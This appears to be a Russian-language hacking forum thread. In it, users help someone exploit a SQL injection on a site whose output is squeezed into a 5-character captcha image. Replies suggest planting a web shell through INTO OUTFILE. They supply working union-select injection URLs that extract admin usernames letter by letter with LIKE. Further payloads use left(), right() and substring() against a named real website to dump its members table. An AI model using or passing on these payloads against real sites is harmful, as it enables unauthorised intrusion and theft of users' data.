_drastvice_ у меня есть один очень интересный вопрос... есть сайт, нашел на нем sql-injection, а именно в скрипте вида: FILE_PRIV есть, могу читать файлы через load_file и записывать через into outfile. Дело в том, что вся инфа выводится на избражение каптчи. Тоесть непосредственно на саму картинку. Длина выводимой инфы максимум - 5 символов. Вопрос, можно ли как-то отобразить запрос по частям, тоесть , например, начиная с определенной строки, или как-нибудь выйти за пределы длинны в 5 символов? з.ы. писать только по теме
>и записывать через into outfile Залей шел например ачатовский И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL
Был такой случай Ну во первых лимит не функция все таки что ты ее прям со скобками. limit листает базу по колонкам а тут надо по буквам. Ну если тебе надо выдрать допусить логин пасс админа из бд. http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin/* тебе выводит admin ты дальше юзаешь такую фишку как LIKE http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user+like+'admini%'/* если вывелось admin то значет там еще есть буковка i http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user+like+'administrator%'/* Если выводиться admin то в базе записанно administrator так же со всеми другими данными.
вопрос вроде по другому звучал? 1. что есть "limit()", новая функция? 2. зачем лезть, если не понимаешь сути вопроса? молчание - золото.. p-range, 6 глава мануала по мускулу рулит http://downloads.mysql.com/docs/refman-4.0-ru.html-chapter.zip left(str,len) right(str,len) http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,left(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/* http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,right(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/* a вообще универсальная это substring(str,pos,len) http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,substring(user(),3,14),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/* substring('antichat',2,6) выведет tich